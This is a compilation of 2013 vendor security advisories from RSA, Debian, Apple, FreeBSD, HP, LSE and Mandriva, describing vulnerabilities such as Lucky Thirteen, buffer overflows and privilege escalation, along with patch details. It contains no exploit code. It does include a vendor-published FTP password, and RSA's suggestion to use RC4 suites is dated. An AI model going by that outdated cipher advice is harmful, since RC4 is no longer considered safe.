To address Lucky Thirteen, RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain a patch that is designed to help ensure that MAC checking is time invariant in servers.

Customers can also protect against the Lucky Thirteen attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.

Obtaining Downloads:

Obtaining Documentation:

Severity Rating:

Obtaining More Information:

For more information about RSA products, visit the RSA web site at http://www.rsa.com.

Getting Support and Service:

General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264

RSA SecurCare Online:

https://knowledge.rsasecurity.com

EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details.
http://www.rsa.com/node.aspx?id=2575

SecurCare Online Security Advisories

About RSA SecurCare Notes & Security Advisories Subscription

Sincerely,

RSA Customer Support

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlHBwyMACgkQtjd2rKp+ALwI0gCbBNOxiDjCZzTl293lMa53Yy2r
pcsAn2UpV1x8Zg4031kyOrW5LfV2vner
=W+qW
-----END PGP SIGNATURE-----

ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability

Security Alert — 2013-06-19T14:51:13

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka Lucky Thirteen) Vulnerability

EMC Identifier: ESA-2013-045

CVE Identifier: CVE-2013-0169

Severity Rating: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)

Affected Products:

All versions of RSA BSAFE SSL-C except for 2.8.7

Unaffected Products:

RSA BSAFE SSL-C 2.8.7 (newly released)

Summary:

RSA BSAFE SSL-C 2.8.7 contains updates designed to prevent SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).

Details:

Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf

Recommendation:

RSA BSAFE SSL-C 2.8.7 contains a patch that is designed to help ensure that MAC checking is time invariant in servers.

RSA recommends that customers on RSA BSAFE SSL-C 2.8.6 or lower upgrade to RSA BSAFE SSL-C 2.8.7.

Customers can also protect against the attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.

Obtaining Downloads

Obtaining Documentation:

Severity Rating:

Obtaining More Information:

For more information about RSA products, visit the RSA web site at http://www.rsa.com.

Getting Support and Service:

General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264

RSA SecurCare Online:

https://knowledge.rsasecurity.com

EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details.
http://www.rsa.com/node.aspx?id=2575

SecurCare Online Security Advisories

About RSA SecurCare Notes & Security Advisories Subscription

Sincerely,

RSA Customer Support

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlHBwwAACgkQtjd2rKp+ALzA8QCeKc//gfYNJwz8q+g7GtInPEgS
gIcAoI2ry3F2QWCjVbEC7w7Ll2jed3mo
=cTJ7
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2628-2] nss-pam-ldapd update

Moritz Muehlenhoff — 2013-06-18T19:52:40

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2628-2                   security< at >debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
June 18, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : nss-pam-ldapd
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-0288

The security update DSA-2628 for nss-pam-ldapd failed to build on
kfreebsd-amd64 and kfreebsd-i386. 

For the oldstable distribution (squeeze) this problem has been fixed in
version 0.7.15+squeeze4.

We recommend that you upgrade your nss-pam-ldapd packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHAuioACgkQXm3vHE4uylp1SgCfRfaE/82UPlw630fJJY2AiO9G
cQgAniRuJHY6scVJcCIszlq69vCLRwIv
=swiz
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2698-1] tiff security update

Michael Gilbert — 2013-06-18T19:39:25

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2698-1                   security< at >debian.org
http://www.debian.org/security/                           Michael Gilbert
June 18, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : tiff
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-1960 CVE-2013-1961
Debian Bug     : 706674 706675

Multiple issues were discovered in the TIFF tools, a set of utilities for
TIFF image file manipulation and conversion.

CVE-2013-1960

    Emmanuel Bouillon discovered a heap-based buffer overflow in the
    tp_process_jpeg_strip function in the tiff2pdf tool.  This could
    potentially lead to a crash or arbitrary code execution.

CVE-2013-1961

    Emmanuel Bouillon discovered many stack-based buffer overflows in
    the tiff tools.  These issues could potentially lead to a crash or
    arbitrary code execution.

For the oldstable distribution (squeeze), these problems have been fixed in
version 3.9.4-5+squeeze9.

For the stable distribution (wheezy), these problems have been fixed in
version 4.0.2-6+deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 4.0.2-6+nmu1.

We recommend that you upgrade your tiff packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce< at >lists.debian.org




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHAtbAACgkQXm3vHE4uyloDOACgozJ0lFhXdu7Ef6NVI2OhKVzU
bdYAmweZ9zSg0QfyDtpcV7ncCvKSveaW
=mHsg
-----END PGP SIGNATURE-----

APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and Mac OS X v10.6 Update 16

Apple Product Security — 2013-06-18T20:10:03

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and
Mac OS X v10.6 Update 16

Java for OS X 2013-004 and Mac OS X v10.6 Update 16 is now available
and addresses the following:

Java
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact:  Multiple vulnerabilities in Java 1.6.0_45
Description:  8011782  Multiple vulnerabilities existed in Java
1.6.0_45, the most serious of which may allow an untrusted Java
applet to execute arbitrary code outside the Java sandbox. Visiting a
web page containing a maliciously crafted untrusted Java applet may
lead to arbitrary code execution with the privileges of the current
user. These issues were addressed by updating to Java version
1.6.0_51. Further information is available via the Java website at ht
tp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1500
CVE-2013-1571
CVE-2013-2407
CVE-2013-2412
CVE-2013-2437
CVE-2013-2442
CVE-2013-2443
CVE-2013-2444
CVE-2013-2445
CVE-2013-2446
CVE-2013-2447
CVE-2013-2448
CVE-2013-2450
CVE-2013-2451
CVE-2013-2452
CVE-2013-2453
CVE-2013-2454
CVE-2013-2455
CVE-2013-2456
CVE-2013-2457
CVE-2013-2459
CVE-2013-2461
CVE-2013-2463
CVE-2013-2464
CVE-2013-2465
CVE-2013-2466
CVE-2013-2468
CVE-2013-2469
CVE-2013-2470
CVE-2013-2471
CVE-2013-2472
CVE-2013-2473
CVE-2013-3743
CVE_2013-2445


Java for OS X 2013-004 and Mac OS X v10.6 Update 16
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/

For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update16.dmg
Its SHA-1 digest is: a6b5a9caa3c0d9acf743da8e4c0e5cfe4e471b01

For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-004.dmg
Its SHA-1 digest is: 153c3f74d5285d10008fce2004d904da8d2ffdff

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org

iQIcBAEBAgAGBQJRwL5AAAoJEPefwLHPlZEwju0QALM1IST/ATt2xR1L0AQcaZRX
eiM07MlvAlE9Jv45xqKLUezRU8XQT6+glN51/hBhpyCa8MJIzPiSnnOIAW+vbA5o
RjXQTGPGT1IPSfEk7OWS++566riMLmTOvg45Qn0E/ibOqJHpfrR4wzQX5jpv7lzH
EbdKxn+KWfHCF2y/2LCFifDHUBPCjUlbWTRznDCYVHsFbtDiP/vAZiSXsNJtLTXK
UOD/eGbel2PEqWOOsUNIrzwvztRB+LsYT4xKQQnsEKJqoyMch/UgB1Uo2jgEPn0U
YP3WZbjbDV+UcM+yMoCV/qDFhbJ+qBxTbuwYOHuSDpgqJ7vF8s0cdUUb6U7QLW4/
3ykC7vOUS/JqYkiqwUxuKVpzSUYXrlez36sQuwCR9AOGCJ/0/MwM8QPavFAdGisP
36ZavJ4k2Dp2CfVmWjexpWY7XN9M36Lh57XChxQk9TcbjUJRrqNadlPyzaja3G9a
95Dq1N1dYfLuFm4MtyeDA0xQl8m8ljnSxH3TQoDcTwvvWGIGdG7EEVpdQqM/MTWY
CY2EqMkY3Gouet+QvECYwxOz+g0hcaJd973kSM+5AJ7tVfod93NDW3P13k2cfdTC
uo9IgGkhuNY40NuLpJLtTwlHcTCwBtKPt0BLwXugZdoDrgz1j8Q+fLuASSTkUQxl
3t9MUCG40o5ZQFyWqV1+
=zFXN
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2710-1] xml-security-c security update

Salvatore Bonaccorso — 2013-06-18T15:44:22

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2710-1                   security< at >debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
June 18, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xml-security-c
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-2153 CVE-2013-2154 CVE-2013-2155 CVE-2013-2156

James Forshaw from Context Information Security discovered several
vulnerabilities in xml-security-c, an implementation of the XML Digital
Security specification. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2013-2153

    The implementation of XML digital signatures in the Santuario-C++
    library is vulnerable to a spoofing issue allowing an attacker to
    reuse existing signatures with arbitrary content.

CVE-2013-2154

    A stack overflow, possibly leading to arbitrary code execution,
    exists in the processing of malformed XPointer expressions in the
    XML Signature Reference processing code.

CVE-2013-2155

    A bug in the processing of the output length of an HMAC-based XML
    Signature would cause a denial of service when processing specially
    chosen input.

CVE-2013-2156

    A heap overflow exists in the processing of the PrefixList attribute
    optionally used in conjunction with Exclusive Canonicalization,
    potentially allowing arbitary code execution.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1.5.1-3+squeeze2.

For the stable distribution (wheezy), these problems have been fixed in
version 1.6.1-5+deb7u1.

For the unstable distribution (sid), these problems have been fixed in
version 1.6.1-6.

We recommend that you upgrade your xml-security-c packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCgAGBQJRwHydAAoJEHidbwV/2GP+4yoP/Rnk79Cvk1G7JKQXvnwyaRWm
rXg8dxNz2RihzscmdS5t7EdZem3Xp1vAdVzgXlQK9Ll8DbqtMXgvM3/CburBHtn5
2CXJyryJ5YtK9758JQLjjE5zS74AWMgEUFcu5zBjAC9BX5XWRVRa67yovi8xsync
sDiQTsVPSe8IWJ1N2Le70qA/2Bmzf7E+EPYig8kEFa3dEb3+KJ2d2e/mJbexv0CJ
FNZTVyHRD2Q/kiB74IUyUBuuyw1gMAj+tdEmucdMgzAU6dBvoP+p5/uLXWoeTez6
X0TJqglbMPSod1LQrMdd4kzo5LZ8P1EjS2S7I6oq5n4kUcw4WLrSmxCDMXci52um
WwFk8r4LdnXYDaBeuNtO0Z0TeJ3YaFuoOMzZadVgqqU7TX6DzOYC1q+dj0TxYXjD
2Fxu8/18mU9qO4oADVkk/OpsLday4br+HOvzAJXfySh65sLP39PyYeDMZp+BAJ4S
Z2enVfaVz7p/oBardDElD5E1qiLo+tC8meFwJ7yJhwJuzOh9qYDjCa0dXD1ZcYso
vqAxnnW4RTerY4dpvsFuZCcKcDzfh3Pf4M2MkBiJ8ZHw6t1BAjOPb7XcSYzmmoEu
s2L+yhZrxd5iDjMZ1SwOhds5k/rg7sIibi0HZgtjmm/CRxLhMDDl6iqJEHv7jB/x
/6laY6ryAuw5RTWhC6Ae
=jPyl
-----END PGP SIGNATURE-----

FreeBSD Security Advisory FreeBSD-SA-13:06.mmap

FreeBSD Security Advisories — 2013-06-18T07:32:24

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-13:06.mmap                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Privilege escalation via mmap

Category:       core
Module:         kernel
Announced:      2013-06-18
Credits:        Konstantin Belousov
                Alan Cox
Affects:        FreeBSD 9.0 and later
Corrected:      2013-06-18 09:04:19 UTC (stable/9, 9.1-STABLE)
                2013-06-18 09:05:51 UTC (releng/9.1, 9.1-RELEASE-p4)
CVE Name:       CVE-2013-2171

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:http://security.FreeBSD.org/>.

I.   Background

The FreeBSD virtual memory system allows files to be memory-mapped.
All or parts of a file can be made available to a process via its
address space.  The process can then access the file using memory
operations rather than filesystem I/O calls.

The ptrace(2) system call provides tracing and debugging facilities by
allowing one process (the tracing process) to watch and control
another (the traced process).

II.  Problem Description

Due to insufficient permission checks in the virtual memory system, a
tracing process (such as a debugger) may be able to modify portions of
the traced process's address space to which the traced process itself
does not have write access.

III. Impact

This error can be exploited to allow unauthorized modification of an
arbitrary file to which the attacker has read access, but not write
access.  Depending on the file and the nature of the modifications,
this can result in privilege escalation.

To exploit this vulnerability, an attacker must be able to run
arbitrary code with user privileges on the target system.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-13:06/mmap.patch
# fetch http://security.FreeBSD.org/patches/SA-13:06/mmap.patch.asc
# gpg --verify mmap.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:http://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

3) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/9/                                                         r251902
releng/9.1/                                                       r251903
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing XXXXXX with the revision number, on a
machine with Subversion installed:

# svn diff -cXXXXXX --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing XXXXXX with the revision number:

<URL:http://svnweb.freebsd.org/base?view=revision&revision=XXXXXX>

VII. References

<other info on vulnerability>

<URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2171>

The latest revision of this advisory is available at
<URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-13:06.mmap.asc>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (FreeBSD)

iEYEARECAAYFAlHAB+YACgkQFdaIBMps37IjFACdFSoiYO1YkcPunLh7Zw4TC6MF
X9MAnjjVWB2uEl60Rl3K4WOuJ71AVNlP
=8309
-----END PGP SIGNATURE-----

[security bulletin] HPSBHF02885 rev.2 - HP Integrated Lights-Out iLO3 and iLO4 using Single-Sign-On (SSO), Remote Unauthorized Access

2013-06-17T21:02:07

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Document ID: c03787836
Version: 2

HPSBHF02885 rev.2 - HP Integrated Lights-Out iLO3 and iLO4 using
Single-Sign-On (SSO), Remote Unauthorized Access

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-06-11
Last Updated: 2013-06-17

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP Integrated
Lights-Out iLO3 and iLO4 using Single-Sign-On (SSO). The vulnerability could
be remotely exploited resulting in unauthorized access.

References: CVE-2013-2338 (SSRT101180)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Integrated Lights-Out 3 (iLO3) firmware versions prior to v1.57.
HP Integrated Lights-Out 4 (iLO4) firmware versions prior to v1.22.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2013-2338    (AV:N/AC:M/Au:N/C:C/I:C/A:C)       9.3
===========================================================
             Information on CVSS is documented
            in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following Firmware updates available to resolve the
vulnerability.

The latest firmware and installation instructions are available from the HP
Business Support Center: http://www.hp.com/go/bizsupport

HP Integrated Lights-Out 4 (iLO4) Online ROM Flash Component for Linux and
Windows v1.22 or subsequent.

HP Integrated Lights-Out 3 (iLO3) Online ROM Flash Component for Linux and
Windows v1.57 or subsequent.

Note: Due to an unexpected delay in the iLO3 v1.57 firmware release, please
use the following temporary FTP site for downloading the update...

FTP System: ftp.usa.hp.com (15.192.32.78 or 15.193.0.64)

Login: ilo3_157
Password: G!v3t2me

Note: login and password are CASE-sensitive.

HISTORY
Version:1 (rev.1) - 11 June 2013 Initial release
Version:2 (rev.2) - 17 June 2013 Added temporary FTP access for the v1.57
update

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-alert< at >hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert< at >hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iEYEARECAAYFAlG/djMACgkQ4B86/C0qfVkHiACgn0XlQWyf/S/8MtibsXQiGspT
YbYAoPy9xXLHhUTdgLbjggK8E2uBJlJ3
=UsA8
-----END PGP SIGNATURE-----

Re: WordPress 3.5.1, Denial of Service

Henri Salo — 2013-06-13T06:34:18

Please use CVE-2013-2173 for this issue.

---
Henri Salo

LSE Leading Security Experts GmbH - LSE-2013-06-13 - Avira AntiVir Engine

LSE Leading Security Experts GmbH (Security Advisories — 2013-06-13T12:57:09

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


=== LSE Leading Security Experts GmbH - Security Advisory 2013-06-13 ===

Avira AntiVir Engine -- Denial of Service / Filtering Evasion
- -------------------------------------------------------------

Affected Versions
=================
Avira AntiVir Engine < 8.2.12.58

Affected products using the AntiVir engine are:

Avira Server Security
Avira AntiVir MailGate
Avira AntiVir MailGate Suite
Avira Exchange Security
Avira AntiVir WebGate
Avira AntiVir WebGate Suite
Avira AntiVir SharePoint
Avira Professional Security
Avira AntiVir Personal
Avira Savapi

Problem Overview
================
Technical Risk: high
Likelihood of Exploitation: high
Vendor: Avira Operations GmbH & Co. KG
Credits: LSE Leading Security Experts GmbH employees Markus Vervier
and Eric Sesterhenn
Advisory URL: http://www.lsexperts.de/advisories/lse-2013-06-13.txt
Advisory Status: Public
CVE-Number: CVE-2013-4602

Problem Description
===================
While conducting a penetration test on a customer system LSE Leading
Security Experts GmbH discovered a Denial of Service vulnerability and
possible memory corruption in the Avira AntiVir Engine.
By scanning specially crafted PDF documents, a bug can be triggered
which causes an endless loop in the scanning engine.

Temporary Workaround and Fix
============================
LSE Leading Security Experts GmbH advises to install the latest
updates via the update functionality. The fix for this issue was
released by Avira Operations GmbH on 2013-06-11.

Problem Impact
==============
When scanning specially crafted PDF documents an endless loop is
caused in the Avira AntiVir scanning engine. This allows an attacker
to stall the antivirus engine and prevent malicious files from being
detected.
Additionally an attacker may be able to cause the antivirus engine to
consume all available resources on the system. In case of enterprise
setups like for example mailgateways an effective Denial of Service
attack can be launched on the whole system.
LSE Leading Security Experts GmbH will provide additional details
including a proof of concept on a later date to protect affected
customers.

History
=======
2013-06-05 Problem discovery during penetration testing
2013-06-06 Original vendor contacted
2013-06-06 Vulnerability confirmed by vendor
2013-06-11 Updated Engine Released
2013-06-13 CVE-2013-4602 assigned
2013-06-13 Coordinated Advisory Release
- -- 
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Tel.: +49 (0) 6151 86086-0, Fax: -299,
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschäftsführer: Oliver Michel, Sven Walther, Dr. Peter Schill
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Icedove - http://www.enigmail.net/

iQIcBAEBAgAGBQJRucGlAAoJEDgSCSGZ4yd8czUQALx7SSxJHOL/yNXIruEE+ZO6
uSwsnMlfKZc9Pp4+D7aTvdeA8ZYIbHgDJ9V/lHBXu08d496PaBDcxClvyMqKn/DF
fnT4rylPfuCLvA9qfPLQtswUMzzM5GeC97+xb+7J0zTXIkDkH+7k6uodzEdmVhsn
qVt+qWaO1CEbjEKIkQ4kirbvScNRTF3BlJcJsvPtI4vmrssLyUTeVm5Gamx47LfE
S25i3zMkqIH9yJTJoJNKWwXlnzpRjVxpUyN/ZmcvwXgXzFmJ3Q3b6Bt4cVquw0O9
/EPZWQmd6z+qe3Z3QC0Q2UabNWW/lqvsyliguF0gwc/X+HXPVGQtJ+AIieg0HwB6
QLTeYHuJXl/ZYaKCqMFFSX/0ZHhUsOMUZWa9FQlfAmXOvvWe2gIz8Q7zIVJAUmqR
s9Zxj6NMtYw/PiQNxEmSVypudYS+lD05eYqldPZtTsByf7gVd/RRlJzhXVznxWxZ
eqBWys6wrhnVfWvArhOJQqWsCrrI7by0GXDavQ+Ar6wYa9ovvPQDDUp8kfdZNEoV
k6WOH8YYu6942uxZF39dFUbx7Gk+GU4lgzcmNtXx62sU9S63zG07gWl98zcpgR0N
IpMITxyyYa0QJ23Ig07D+QQpOjPQN4wnJSqVwnpED1dumTaUrYSgm8GTgSP7wm7n
6Gvy3ghRtVKuQja0qwrY
=BxkJ
-----END PGP SIGNATURE-----

[ MDVSA-2013:173 ] subversion

2013-06-13T17:58:00

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2013:173
 http://www.mandriva.com/en/support/security/
 _______________________________________________________________________

 Package : subversion
 Date    : June 13, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 _______________________________________________________________________

 Problem Description:

 Multiple vulnerabilities has been found and corrected in subversion:
 
 If a filename which contains a newline character (ASCII 0x0a)
 is committed to a repository using the FSFS format, the resulting
 revision is corrupt. This can lead to disruption for users of the
 repository (CVE-2013-1968).
 
 Subversion&#039;s svnserve server process may exit when an incoming TCP
 connection is closed early in the connection process. This can lead
 to disruption for users of the server (CVE-2013-2112).
 
 This advisory provides the latest versions of subversion
 (1.6.23/1.7.10) which is not vulnerable to these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1968
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2112
 http://subversion.apache.org/security/CVE-2013-1968-advisory.txt
 http://subversion.apache.org/security/CVE-2013-2112-advisory.txt
 _______________________________________________________________________

 Updated Packages:

 Mandriva Enterprise Server 5:
 131a0451a20a116151def1bb4240b102  mes5/i586/apache-mod_dav_svn-1.6.23-0.1mdvmes5.2.i586.rpm
 eee20686ffae03646f8c849e33f44360  mes5/i586/apache-mod_dontdothat-1.6.23-0.1mdvmes5.2.i586.rpm
 8440bcd1e593f325728ea6bd0a21f80d  mes5/i586/libsvn0-1.6.23-0.1mdvmes5.2.i586.rpm
 607748fe61df7f35d52bc82ec03c9a67  mes5/i586/libsvnjavahl1-1.6.23-0.1mdvmes5.2.i586.rpm
 e6913bb295f8810d632dc699888a7e6a  mes5/i586/perl-SVN-1.6.23-0.1mdvmes5.2.i586.rpm
 ee552c9ebb20a8384a25dae7bbbb0816  mes5/i586/python-svn-1.6.23-0.1mdvmes5.2.i586.rpm
 05961e48fc20f5303e9d49f4d6f715e5  mes5/i586/ruby-svn-1.6.23-0.1mdvmes5.2.i586.rpm
 54dcdd8dcb2f953c511abeb4a19173f6  mes5/i586/subversion-1.6.23-0.1mdvmes5.2.i586.rpm
 bfac1c0ea2758ce3e2b21ebfba53846e  mes5/i586/subversion-devel-1.6.23-0.1mdvmes5.2.i586.rpm
 f8568714332798f5488eb3da460e6dd9  mes5/i586/subversion-doc-1.6.23-0.1mdvmes5.2.i586.rpm
 8ea846e80917df50536fece8bd792cea  mes5/i586/subversion-server-1.6.23-0.1mdvmes5.2.i586.rpm
 5f934c5019a060f3a55529e5dafd331e  mes5/i586/subversion-tools-1.6.23-0.1mdvmes5.2.i586.rpm
 0c6f70281c91a449cc2a84c1d555f72f  mes5/i586/svn-javahl-1.6.23-0.1mdvmes5.2.i586.rpm 
 555d17a58efeced4a57efb33eadc39be  mes5/SRPMS/subversion-1.6.23-0.1mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 50c81e373fe650024014f4308546ac17  mes5/x86_64/apache-mod_dav_svn-1.6.23-0.1mdvmes5.2.x86_64.rpm
 729b85dff018808ed9ebd5a09cb46dab  mes5/x86_64/apache-mod_dontdothat-1.6.23-0.1mdvmes5.2.x86_64.rpm
 618a89de1ff48514b7d153b4375d5a0e  mes5/x86_64/lib64svn0-1.6.23-0.1mdvmes5.2.x86_64.rpm
 6755bee85225a0c029fd505e31f99e6f  mes5/x86_64/lib64svnjavahl1-1.6.23-0.1mdvmes5.2.x86_64.rpm
 4ded75c4e650788b18a937dac27548e1  mes5/x86_64/perl-SVN-1.6.23-0.1mdvmes5.2.x86_64.rpm
 2c639f9f42c15ac323d46c2c26ceb5bd  mes5/x86_64/python-svn-1.6.23-0.1mdvmes5.2.x86_64.rpm
 beb83feaf1a7a6ca8120aa86279329ab  mes5/x86_64/ruby-svn-1.6.23-0.1mdvmes5.2.x86_64.rpm
 79e5c84f4f9200b7b708f87969e4e913  mes5/x86_64/subversion-1.6.23-0.1mdvmes5.2.x86_64.rpm
 b070d1842ddae3c4b227d9396c3d48f2  mes5/x86_64/subversion-devel-1.6.23-0.1mdvmes5.2.x86_64.rpm
 13ea5d25cce79b78555127c1639f0248  mes5/x86_64/subversion-doc-1.6.23-0.1mdvmes5.2.x86_64.rpm
 9c08924dca5a913f562afc0b17d6e7b5  mes5/x86_64/subversion-server-1.6.23-0.1mdvmes5.2.x86_64.rpm
 e6df2ebf5391278cb05e633d118d7a46  mes5/x86_64/subversion-tools-1.6.23-0.1mdvmes5.2.x86_64.rpm
 352235f62cb3a585b397b67f8f8687db  mes5/x86_64/svn-javahl-1.6.23-0.1mdvmes5.2.x86_64.rpm 
 555d17a58efeced4a57efb33eadc39be  mes5/SRPMS/subversion-1.6.23-0.1mdvmes5.2.src.rpm

 Mandriva Business Server 1/X86_64:
 96ce805f5926a86cfb9928ee4878adbc  mbs1/x86_64/apache-mod_dav_svn-1.7.10-0.1.mbs1.x86_64.rpm
 e01f199c914dd3d686c0875d24456945  mbs1/x86_64/lib64svn0-1.7.10-0.1.mbs1.x86_64.rpm
